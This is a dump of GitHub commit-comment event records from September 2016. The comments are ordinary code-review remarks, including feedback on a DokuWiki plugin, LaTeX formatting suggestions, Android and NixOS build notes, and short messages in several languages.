{"id":"4511907162","type":"CommitCommentEvent","actor":{"login":"twsh"},"repo":{"name":"jgm/pandoc-templates"},"payload":{"comment":{"id":18889551,"position":null,"line":null,"path":null,"commit_id":"6b2a1db0b9a8d5d7daca2c4542ad1a011b64d56b","created_at":"2016-09-03T09:33:14Z","updated_at":"2016-09-03T09:33:14Z","body":"Would this be better using parskip.sty, as in the LaTeX template after https://github.com/jgm/pandoc-templates/commit/ddf17ce3dfff35c5e3ff0b4e90ef9533ecb218c8 ?\r\n```\r\n\\IfFileExists{parskip.sty}{%\r\n\\usepackage{parskip}\r\n}{% else\r\n\\setlength{\\parindent}{0pt}\r\n\\setlength{\\parskip}{6pt plus 2pt minus 1pt}\r\n}\r\n```"}},"created_at":"2016-09-03T09:33:14Z"}
{"id":"4511907905","type":"CommitCommentEvent","actor":{"login":"Kotic2010"},"repo":{"name":"Kotic2010/test"},"payload":{"comment":{"id":18889553,"position":2,"line":2,"path":"index.txt","commit_id":"ab5a05fb824e235254c35f885f3e2a7b429c8619","created_at":"2016-09-03T09:33:58Z","updated_at":"2016-09-03T09:33:58Z","body":"dfgdfg"}},"created_at":"2016-09-03T09:33:58Z"}
{"id":"4511908210","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18889554,"position":null,"line":null,"path":null,"commit_id":"187d3cd4f74c1b54166728e757224e12380eeff7","created_at":"2016-09-03T09:34:14Z","updated_at":"2016-09-03T09:34:14Z","body":"@cyberium what about VC120?\r\nyou missed that one"}},"created_at":"2016-09-03T09:34:14Z"}
{"id":"4511909315","type":"CommitCommentEvent","actor":{"login":"jruesga"},"repo":{"name":"jruesga/rview"},"payload":{"comment":{"id":18889559,"position":8,"line":0,"path":"app/src/main/java/com/ruesga/rview/ChangeDetailsActivity.java","commit_id":"1417d96916c3bb67e73ab3a197533030eb266659","created_at":"2016-09-03T09:35:12Z","updated_at":"2016-09-03T09:35:12Z","body":"Ah, yes. I used to easy test changes instead of navigate through the list. I forget to remove it."}},"created_at":"2016-09-03T09:35:12Z"}
{"id":"4511910469","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889564,"position":2,"line":2,"path":"LICENSE","commit_id":"acf46e5f4e299ca83697da3c5b88f90cb6acf08a","created_at":"2016-09-03T09:36:22Z","updated_at":"2016-09-03T09:36:22Z","body":"the license is wrong. DokuWiki is licensed under GPLv2 and thus all plugins are, too."}},"created_at":"2016-09-03T09:36:22Z"}
{"id":"4511910986","type":"CommitCommentEvent","actor":{"login":"dnomikos"},"repo":{"name":"Xiaomi-Miui-Hellas/MIUI-XML-8.0-Greek"},"payload":{"comment":{"id":18889566,"position":null,"line":null,"path":null,"commit_id":"11363ee37c069d9265183023d1d1f016249f54db","created_at":"2016-09-03T09:36:53Z","updated_at":"2016-09-03T09:36:53Z","body":"Hello,\r\nUse only English language in descriptions"}},"created_at":"2016-09-03T09:36:53Z"}
{"id":"4511911139","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889567,"position":18,"line":18,"path":"admin.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T09:37:03Z","updated_at":"2016-09-03T09:37:03Z","body":"you need to return an integer here"}},"created_at":"2016-09-03T09:37:03Z"}
{"id":"4511912528","type":"CommitCommentEvent","actor":{"login":"midenok"},"repo":{"name":"natsys/mariadb_10.2"},"payload":{"comment":{"id":18889570,"position":null,"line":null,"path":null,"commit_id":"1edfb7b7ac6084760b019f6ffcf64f6ed7d0a7b6","created_at":"2016-09-03T09:38:26Z","updated_at":"2016-09-03T09:38:26Z","body":"[Analysis](https://github.com/natsys/mariadb/issues/2)"}},"created_at":"2016-09-03T09:38:26Z"}
{"id":"4511912766","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889571,"position":140,"line":140,"path":"admin.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T09:38:40Z","updated_at":"2016-09-03T09:38:40Z","body":"You should use DOKU_BASE or wl() to construct URLs"}},"created_at":"2016-09-03T09:38:40Z"}
{"id":"4511913121","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889572,"position":25,"line":25,"path":"admin.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T09:39:01Z","updated_at":"2016-09-03T09:39:01Z","body":"Are you sure you want this to be accessible for managers?"}},"created_at":"2016-09-03T09:39:01Z"}
{"id":"4511913579","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889575,"position":61,"line":61,"path":"admin.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T09:39:26Z","updated_at":"2016-09-03T09:39:26Z","body":"you should use DokuWiki's translation mechanism"}},"created_at":"2016-09-03T09:39:26Z"}
{"id":"4511914142","type":"CommitCommentEvent","actor":{"login":"samaaron"},"repo":{"name":"samaaron/sonic-pi"},"payload":{"comment":{"id":18889577,"position":null,"line":null,"path":null,"commit_id":"33c929ccde52f3854450e85c628c53e2c5a3f139","created_at":"2016-09-03T09:40:02Z","updated_at":"2016-09-03T09:40:02Z","body":"Hi, that OSC API endpoint was experimental and has now been removed.\r\n\r\nWe really need to think about how to deal with large files throughout the API. Personally, I'm biased to working within the limits of the UDP packet size as having a sensible limit on the file size opens up a whole exciting set of options for whole-file-manipulation on an per-edit basis. Whereas allowing arbitrarily large files will slow these operations down as the file size increases.\r\n\r\nAlso, be warned, whilst you can use the OSC API to plug in external editors such as Atom, the API is not stable and may change without warning as I work stuff out. \r\n\r\nAll that being said, I definitely value opinion, thoughts and ideas about how this should work in a way that benefits everyone. I do know that a number of people do want to compose with huge files, and I would like to make sure that's possible to some extent (perhaps by turning off all the fancy editor features I'm planning)."}},"created_at":"2016-09-03T09:40:02Z"}
{"id":"4511914523","type":"CommitCommentEvent","actor":{"login":"Vampire"},"repo":{"name":"vivin/gradle-semantic-build-versioning"},"payload":{"comment":{"id":18889578,"position":null,"line":null,"path":null,"commit_id":"0dc0e185937c10680199fee0bfe9ca8da36d12f3","created_at":"2016-09-03T09:40:20Z","updated_at":"2016-09-03T09:40:20Z","body":"Well, `afterEvaluate` might not be late enough. `afterEvaluate` should evaluate as soon a s project is evaluated. If you have a multi-project build and have an `afterEvaluate` block for the root project, this should be executed after the root project was evaluated and before all subprojects were evaluated and thus far before the task graph is ready. The most reliable way would be to either use a reference to the version that is evaluated at execution time or to use a closure where version.toString() is executed only at execution time or something like that. How to properly defer the evaluation of the version is highly situation dependent, but `afterEvaluate` is likely to be too soon.\r\n\r\nMaybe you should instead not bet on marker tasks, but use project properties for those marker things that chnage the version. Those could again be evaluated at applying time properly."}},"created_at":"2016-09-03T09:40:20Z"}
{"id":"4511914586","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889579,"position":40,"line":40,"path":"admin.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T09:40:23Z","updated_at":"2016-09-03T09:40:23Z","body":"configuration data should be saved in DOKU_CONF"}},"created_at":"2016-09-03T09:40:23Z"}
{"id":"4511915682","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889584,"position":50,"line":50,"path":"admin.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T09:41:19Z","updated_at":"2016-09-03T09:41:19Z","body":"You should use $conf['datadir']"}},"created_at":"2016-09-03T09:41:19Z"}
{"id":"4511915696","type":"CommitCommentEvent","actor":{"login":"dnomikos"},"repo":{"name":"Xiaomi-Miui-Hellas/MIUI-XML-8.0-Greek"},"payload":{"comment":{"id":18889585,"position":null,"line":null,"path":null,"commit_id":"11363ee37c069d9265183023d1d1f016249f54db","created_at":"2016-09-03T09:41:20Z","updated_at":"2016-09-03T09:41:20Z","body":"Use only English language in pull request description"}},"created_at":"2016-09-03T09:41:20Z"}
{"id":"4511915920","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889586,"position":49,"line":49,"path":"admin.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T09:41:35Z","updated_at":"2016-09-03T09:41:35Z","body":"This is probably DOKU_BASE?"}},"created_at":"2016-09-03T09:41:35Z"}
{"id":"4511916739","type":"CommitCommentEvent","actor":{"login":"dnomikos"},"repo":{"name":"Xiaomi-Miui-Hellas/MIUI-XML-8.0-Greek"},"payload":{"comment":{"id":18889588,"position":null,"line":null,"path":null,"commit_id":"11363ee37c069d9265183023d1d1f016249f54db","created_at":"2016-09-03T09:42:19Z","updated_at":"2016-09-03T09:42:19Z","body":"Hello,\r\nUse only English language in pull request description"}},"created_at":"2016-09-03T09:42:19Z"}
{"id":"4511917234","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18889591,"position":10,"line":29,"path":"Front_Staff/Acknowledgments.tex","commit_id":"e564d383e4b0ba384c2e31966c8a7aa6de787502","created_at":"2016-09-03T09:42:43Z","updated_at":"2016-09-03T09:42:43Z","body":"I don't like the expression \"not to mention the...\""}},"created_at":"2016-09-03T09:42:43Z"}
{"id":"4511917710","type":"CommitCommentEvent","actor":{"login":"sonots"},"repo":{"name":"sonots/embulk-filter-column"},"payload":{"comment":{"id":18889593,"position":11,"line":10,"path":"src/main/java/org/embulk/filter/column/path/PropertyPathToken.java","commit_id":"5aa4e77fafd03e4a5b16f3355406f9db13b85c09","created_at":"2016-09-03T09:43:11Z","updated_at":"2016-09-03T09:43:11Z","body":"why not `boolean`?"}},"created_at":"2016-09-03T09:43:11Z"}
{"id":"4511917768","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889594,"position":40,"line":40,"path":"admin.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T09:43:14Z","updated_at":"2016-09-03T09:43:14Z","body":"Also why are you saving your own config? You could easily use DokuWiki's config mechanism and wouldn't need any admin interface at all."}},"created_at":"2016-09-03T09:43:14Z"}
{"id":"4511918647","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18889597,"position":23,"line":55,"path":"Part_II_Theory/2A._equivalence_of_quadrature_projection_order.tex","commit_id":"463f207f9ef819a29aa42283b83bdabecdb17857","created_at":"2016-09-03T09:43:57Z","updated_at":"2016-09-03T09:43:57Z","body":"Is a polynomial of cos theta, but also a polynomial of cos phi, and cos psi."}},"created_at":"2016-09-03T09:43:57Z"}
{"id":"4511919257","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889599,"position":32,"line":32,"path":"config.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T09:44:31Z","updated_at":"2016-09-03T09:44:31Z","body":"why all these defines? You could just pass the config array to your class constructor."}},"created_at":"2016-09-03T09:44:31Z"}
{"id":"4511919430","type":"CommitCommentEvent","actor":{"login":"cyberium"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18889600,"position":null,"line":null,"path":null,"commit_id":"187d3cd4f74c1b54166728e757224e12380eeff7","created_at":"2016-09-03T09:44:42Z","updated_at":"2016-09-03T09:44:42Z","body":":+1: "}},"created_at":"2016-09-03T09:44:42Z"}
{"id":"4511919778","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889601,"position":25,"line":25,"path":"config.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T09:45:04Z","updated_at":"2016-09-03T09:45:04Z","body":"define names need to be strings, you're missing the quotes here."}},"created_at":"2016-09-03T09:45:04Z"}
{"id":"4511920077","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889604,"position":8,"line":8,"path":"dokuimporterClass.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T09:45:20Z","updated_at":"2016-09-03T09:45:20Z","body":"weird indentation"}},"created_at":"2016-09-03T09:45:20Z"}
{"id":"4511920757","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889607,"position":22,"line":22,"path":"dokuimporterClass.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T09:45:56Z","updated_at":"2016-09-03T09:45:56Z","body":"you probably want to use exit() here. die() should be reserved for errors"}},"created_at":"2016-09-03T09:45:56Z"}
{"id":"4511921320","type":"CommitCommentEvent","actor":{"login":"hhugo"},"repo":{"name":"ocsigen/js_of_ocaml"},"payload":{"comment":{"id":18889610,"position":4,"line":2116,"path":"compiler/parse_bytecode.ml","commit_id":"dc30d844be14bb655cf333c1e0372c9c5e208ffa","created_at":"2016-09-03T09:46:30Z","updated_at":"2016-09-03T09:46:30Z","body":"cc @yminsky "}},"created_at":"2016-09-03T09:46:30Z"}
{"id":"4511921345","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889611,"position":92,"line":92,"path":"dokuimporterClass.php","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T09:46:31Z","updated_at":"2016-09-03T09:46:31Z","body":"use rawWiki() for that"}},"created_at":"2016-09-03T09:46:31Z"}
{"id":"4511921425","type":"CommitCommentEvent","actor":{"login":"atjonathan"},"repo":{"name":"Musare/MusareNode"},"payload":{"comment":{"id":18889612,"position":null,"line":null,"path":null,"commit_id":"a5d4e3c2e98e6be945540152069679e1b945d3fb","created_at":"2016-09-03T09:46:36Z","updated_at":"2016-09-03T09:46:36Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;4LbcZdDE&#x2F;22-gulp-and-rename-classes\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Gulp and rename classes</a>"}},"created_at":"2016-09-03T09:46:36Z"}
{"id":"4511921757","type":"CommitCommentEvent","actor":{"login":"splitbrain"},"repo":{"name":"Ellusu/dokuwikibot-plugin"},"payload":{"comment":{"id":18889613,"position":1,"line":1,"path":"manager.dat","commit_id":"79e70327eefc08e3e0a8142d9f1ea853eb3ca856","created_at":"2016-09-03T09:46:54Z","updated_at":"2016-09-03T09:46:54Z","body":"this should not be checked in"}},"created_at":"2016-09-03T09:46:54Z"}
{"id":"4511923883","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18889619,"position":32,"line":92,"path":"Part_II_Theory/2B._rotational_invariant_expansion.tex","commit_id":"6cae09ea37bf49e4ce9e84ae950f8dc4fae57d04","created_at":"2016-09-03T09:48:55Z","updated_at":"2016-09-03T09:48:55Z","body":"is not the full demonstration"}},"created_at":"2016-09-03T09:48:55Z"}
{"id":"4511924008","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"koquantam/android_device_samsung_grandprimeve3g"},"payload":{"comment":{"id":18889620,"position":null,"line":null,"path":null,"commit_id":"d4e31a4938d1898df7d2e6d89b9a9a6cb3791130","created_at":"2016-09-03T09:49:04Z","updated_at":"2016-09-03T09:49:04Z","body":"Hey dude, try this to use the firmwares from CM's repo https://github.com/ngoquang2708/android_kernel_samsung_vivalto3gvn/commit/2c99e605019f5b1fe1a9ec36e2693431f982d0ce."}},"created_at":"2016-09-03T09:49:04Z"}
{"id":"4511924776","type":"CommitCommentEvent","actor":{"login":"TWiStErRob"},"repo":{"name":"hopestarter/hopestarter-android"},"payload":{"comment":{"id":18889621,"position":58,"line":208,"path":"wallet/src/org/hopestarter/wallet/ui/UpdatesFragment.java","commit_id":"e026a256e2b0831378c3de99fb985203872b2951","created_at":"2016-09-03T09:49:45Z","updated_at":"2016-09-03T09:49:45Z","body":"This if-else can be replaced with\r\n```java\r\nglide.load(data.getProfilePictureUri())\r\n    .centerCrop()\r\n    .fallback(R.drawable.avatar_placeholder) // when model is null\r\n    .listener(mImageLoaderListener)\r\n    .into(holder.userPictureView);\r\n```\r\n(no if necessary)"}},"created_at":"2016-09-03T09:49:45Z"}
{"id":"4511925919","type":"CommitCommentEvent","actor":{"login":"zhy1991yhz"},"repo":{"name":"zhouhuanqiang/LearningIOS"},"payload":{"comment":{"id":18889625,"position":null,"line":null,"path":null,"commit_id":"133b026e007a5393e32c4910e2814f235464bc1e","created_at":"2016-09-03T09:50:44Z","updated_at":"2016-09-03T09:50:44Z","body":"感谢分享。小码哥大神班1期  的链接失效了。"}},"created_at":"2016-09-03T09:50:44Z"}
{"id":"4511925967","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18889626,"position":41,"line":131,"path":"Part_II_Theory/2B._rotational_invariant_expansion.tex","commit_id":"6cae09ea37bf49e4ce9e84ae950f8dc4fae57d04","created_at":"2016-09-03T09:50:46Z","updated_at":"2016-09-03T09:50:46Z","body":"LaTeX & is \\&"}},"created_at":"2016-09-03T09:50:46Z"}
{"id":"4511926353","type":"CommitCommentEvent","actor":{"login":"javadev"},"repo":{"name":"Oracleman200/dragons-of-mugloar"},"payload":{"comment":{"id":18889627,"position":null,"line":null,"path":null,"commit_id":"1565078d63c9b69d03d2ec1d85f1ee32b1b41b29","created_at":"2016-09-03T09:51:05Z","updated_at":"2016-09-03T09:51:05Z","body":"Good start.\r\nYou may check for the game solution here: https://github.com/javadev/undescriptive-project"}},"created_at":"2016-09-03T09:51:05Z"}
{"id":"4511926718","type":"CommitCommentEvent","actor":{"login":"kamalhakim"},"repo":{"name":"karamelchef/karamel"},"payload":{"comment":{"id":18889628,"position":null,"line":null,"path":null,"commit_id":"597f345e3e6969089c46720e7f3a4c4860e1c25d","created_at":"2016-09-03T09:51:26Z","updated_at":"2016-09-03T09:51:26Z","body":"Can we please remove examples from karamel project.. this cluster definition up and down commits just spams important features and bug fixes. "}},"created_at":"2016-09-03T09:51:26Z"}
{"id":"4511926756","type":"CommitCommentEvent","actor":{"login":"mtdr"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889629,"position":13,"line":13,"path":"routes/documents/handlers/addDislike.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T09:51:29Z","updated_at":"2016-09-03T09:51:29Z","body":"Ссо кладёт юзера в this.user и можно в любой точке это вызвать? \r\nТут вопрос - при лайках или других \"отметках\" пользователя, нам надо показывать только айди или ещё и имя?"}},"created_at":"2016-09-03T09:51:29Z"}
{"id":"4511926981","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18889630,"position":51,"line":161,"path":"Part_II_Theory/2B._rotational_invariant_expansion.tex","commit_id":"6cae09ea37bf49e4ce9e84ae950f8dc4fae57d04","created_at":"2016-09-03T09:51:44Z","updated_at":"2016-09-03T09:51:44Z","body":"all the projections of index m,n,l,mu,nu"}},"created_at":"2016-09-03T09:51:44Z"}
{"id":"4511927042","type":"CommitCommentEvent","actor":{"login":"nguyenhuuphuong"},"repo":{"name":"nguyenhuuphuong/PPL--HCMUT"},"payload":{"comment":{"id":18889631,"position":null,"line":null,"path":null,"commit_id":"f698c49efd9c7e3167eb3acc32456d7bceb3a5aa","created_at":"2016-09-03T09:51:46Z","updated_at":"2016-09-03T09:51:46Z","body":"compiler BKOOL"}},"created_at":"2016-09-03T09:51:46Z"}
{"id":"4511927520","type":"CommitCommentEvent","actor":{"login":"mtdr"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889634,"position":15,"line":15,"path":"routes/documents/handlers/addDislike.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T09:52:15Z","updated_at":"2016-09-03T09:52:15Z","body":"Хорошо, а вывод документа такой?"}},"created_at":"2016-09-03T09:52:15Z"}
{"id":"4511927530","type":"CommitCommentEvent","actor":{"login":"keks93"},"repo":{"name":"Bauuuuu/android_device_zte_nx512j"},"payload":{"comment":{"id":18889635,"position":null,"line":null,"path":null,"commit_id":"930a95eb1f0258cc91b20a5f997f5b5f52e1faca","created_at":"2016-09-03T09:52:16Z","updated_at":"2016-09-03T09:52:16Z","body":"этот фикс не работает, тестирвал в google camera 2.7"}},"created_at":"2016-09-03T09:52:16Z"}
{"id":"4511928704","type":"CommitCommentEvent","actor":{"login":"mtdr"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889636,"position":15,"line":15,"path":"routes/documents/handlers/getComments.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T09:53:23Z","updated_at":"2016-09-03T09:53:23Z","body":"Она же вроде обработается и откинет в результат без каких-либо проблем. Тут же в обработчике стоит throw err; или я что то неправильно понимаю?"}},"created_at":"2016-09-03T09:53:23Z"}
{"id":"4511929124","type":"CommitCommentEvent","actor":{"login":"vigiljose"},"repo":{"name":"lekma/tvheadend"},"payload":{"comment":{"id":18889638,"position":null,"line":null,"path":null,"commit_id":"06207f2eb2d175d17f8949888654b388002b02f3","created_at":"2016-09-03T09:53:50Z","updated_at":"2016-09-03T09:53:50Z","body":"Hi lekma,\n\nThank you very much for your advice and help! I'll follow it. I'll do more tests to identify if the issue I see happens also with tvheadend master. Good point. I'll go back to you if I see it could be related with your work, as you suggested. \n\nI'd like to thank you for your impressive work with codecs. Many people were waiting for this for a long time, thank you! If I can help you in any way in your work, please just let me know.\n\nOne last quick question if you don't mind. It would be useful for me to be able to define the specific amount of bandwidth used when transcoding with vaapi, but when I configure any value different than 0 in the bitrate at codec profile, the tvheadend always hangs and I need to kill the processes. The same happens to othe people I know. Is bitrate already implemented in the current state of your work? Any advice?\n\nThan you again!\nJose\n\nSent from my iPad\n\n> On 03 Sep 2016, at 08:24, lekma <notifications@github.com> wrote:\n> \n> @vigiljose\n> I would start by testing with tvheadend master to see if the pb you're seeing has been introduced by this branch.\n> \n> If it originates from my work then please open an issue here in the tracker, I'll try to help you. If it is an issue with tvheadend in general, I'd suggest you submit a bug report to https://tvheadend.org/projects/tvheadend/issues. In any case this commit is not the place to discuss bugs, again, I'm bound to squash it all and all the conversation will be lost, unfortunate as it is.\n> \n> (side note: you have to try and isolate the conditions to reproduce what you are seeing, is it the source (try different source format (SD vs HD) if you can), is it the filtering (try with/without deint and scaling), are all the clients watching the same transcode or is it 3 different transcode happening at the same time, etc. The more info you provide, the better it will be for either @perexg or me to try and help you)\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-03T09:53:50Z"}
{"id":"4511929428","type":"CommitCommentEvent","actor":{"login":"mtdr"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889639,"position":2,"line":51,"path":"routes/documents/index.js","commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T09:54:08Z","updated_at":"2016-09-03T09:54:08Z","body":"Это \"настройка\" юзера на универ, факультет и курс) вообще думаю надо это вынести в отдельные /auth запросы"}},"created_at":"2016-09-03T09:54:08Z"}
{"id":"4511930012","type":"CommitCommentEvent","actor":{"login":"mtdr"},"repo":{"name":"AnZuev/StudCloud.WA"},"payload":{"comment":{"id":18889640,"position":null,"line":null,"path":null,"commit_id":"ddcb3d1734d5ab242de6bf5a939784adef03030b","created_at":"2016-09-03T09:54:37Z","updated_at":"2016-09-03T09:54:37Z","body":"Ну и надо написать документацию :)"}},"created_at":"2016-09-03T09:54:37Z"}
{"id":"4511930527","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18889641,"position":null,"line":null,"path":null,"commit_id":"297008b9593d0be4c0eedb084b0e99cf850ce3a4","created_at":"2016-09-03T09:55:08Z","updated_at":"2016-09-03T09:55:08Z","body":"Well, I also managed it to build, but it won't run. SDL is broken, apparently:\r\n```\r\n[gfx]: unable to set video mode: X11 driver not configured with OpenGL\r\n```"}},"created_at":"2016-09-03T09:55:08Z"}
{"id":"4511930961","type":"CommitCommentEvent","actor":{"login":"TWiStErRob"},"repo":{"name":"hopestarter/hopestarter-android"},"payload":{"comment":{"id":18889642,"position":19,"line":19,"path":"wallet/res/layout/recyclerview_update_item_layout.xml","commit_id":"73bed29c1d4f72c4287a5160baaff0bca0e5ef66","created_at":"2016-09-03T09:55:30Z","updated_at":"2016-09-03T09:55:30Z","body":"You'll always replace this in onBind, so the device is unnecessarily loading a Drawable at each inflate. I suggest `tools:src` so the IDE still displays an image in preview."}},"created_at":"2016-09-03T09:55:30Z"}
{"id":"4511932259","type":"CommitCommentEvent","actor":{"login":"TWiStErRob"},"repo":{"name":"hopestarter/hopestarter-android"},"payload":{"comment":{"id":18889644,"position":58,"line":208,"path":"wallet/src/org/hopestarter/wallet/ui/UpdatesFragment.java","commit_id":"e026a256e2b0831378c3de99fb985203872b2951","created_at":"2016-09-03T09:56:43Z","updated_at":"2016-09-03T09:56:43Z","body":"Whops, never mind. The `fallback` won't be cropped like `load` so you need the separate load."}},"created_at":"2016-09-03T09:56:43Z"}
{"id":"4511933045","type":"CommitCommentEvent","actor":{"login":"Grz3s"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18889646,"position":null,"line":null,"path":null,"commit_id":"ccff463cf970800f3dae555e6fd3a0b673ef9e58","created_at":"2016-09-03T09:57:28Z","updated_at":"2016-09-03T09:57:28Z","body":"hey @cyberium ... thanks for your hard work...\r\nCan you pls add info about this new action in...\r\n...\\doc\\EventAi.txt (some ppl using this file :D .. including me) :)\r\nthanks"}},"created_at":"2016-09-03T09:57:28Z"}
{"id":"4511933423","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18889647,"position":144,"line":389,"path":"Part_II_Theory/2B._rotational_invariant_expansion.tex","commit_id":"6cae09ea37bf49e4ce9e84ae950f8dc4fae57d04","created_at":"2016-09-03T09:57:47Z","updated_at":"2016-09-03T09:57:47Z","body":"imaginary, a kind of number."}},"created_at":"2016-09-03T09:57:47Z"}
{"id":"4511934522","type":"CommitCommentEvent","actor":{"login":"Hostiphre"},"repo":{"name":"Hostiphre/M0921"},"payload":{"comment":{"id":18889649,"position":149,"line":393,"path":"Part_II_Theory/2B._rotational_invariant_expansion.tex","commit_id":"6cae09ea37bf49e4ce9e84ae950f8dc4fae57d04","created_at":"2016-09-03T09:58:48Z","updated_at":"2016-09-03T09:58:48Z","body":"why 's'?"}},"created_at":"2016-09-03T09:58:48Z"}
{"id":"4511935047","type":"CommitCommentEvent","actor":{"login":"vcunat"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18889650,"position":null,"line":null,"path":null,"commit_id":"297008b9593d0be4c0eedb084b0e99cf850ce3a4","created_at":"2016-09-03T09:59:18Z","updated_at":"2016-09-03T09:59:18Z","body":"`freeciv-sdl` does run, so it's probably specific to teeworlds, fortunately."}},"created_at":"2016-09-03T09:59:18Z"}
{"id":"4511935535","type":"CommitCommentEvent","actor":{"login":"MunGell"},"repo":{"name":"kenca5ey/training-js-mazerobot"},"payload":{"comment":{"id":18889651,"position":null,"line":null,"path":null,"commit_id":"27f47ce3936dfa3d3689211fb885a57cc1cdfb4c","created_at":"2016-09-03T09:59:49Z","updated_at":"2016-09-03T09:59:49Z","body":"The only thing I would change is to make 1 move at a time :)\r\nTurn should be considered a standalone move :)"}},"created_at":"2016-09-03T09:59:49Z"}
{"id":"4512940594","type":"CommitCommentEvent","actor":{"login":"harrybassi"},"repo":{"name":"LeoNemaeus/Taller-de-programacion"},"payload":{"comment":{"id":18891640,"position":null,"line":null,"path":null,"commit_id":"132cb1a04fd181b3f6e9f6f1a80f2169251371d7","created_at":"2016-09-04T00:00:54Z","updated_at":"2016-09-04T00:00:54Z","body":"Se ve que si... Cambio y fuera...."}},"created_at":"2016-09-04T00:00:54Z"}
{"id":"4512941804","type":"CommitCommentEvent","actor":{"login":"wschella"},"repo":{"name":"ZeusWPI/zeus.ugent.be"},"payload":{"comment":{"id":18891643,"position":null,"line":null,"path":null,"commit_id":"6b5bb351c13a4424e71cb8f32f67e272d75a7990","created_at":"2016-09-04T00:02:15Z","updated_at":"2016-09-04T00:02:15Z","body":"Nice to find some fine coding habits put in practice."}},"created_at":"2016-09-04T00:02:15Z"}
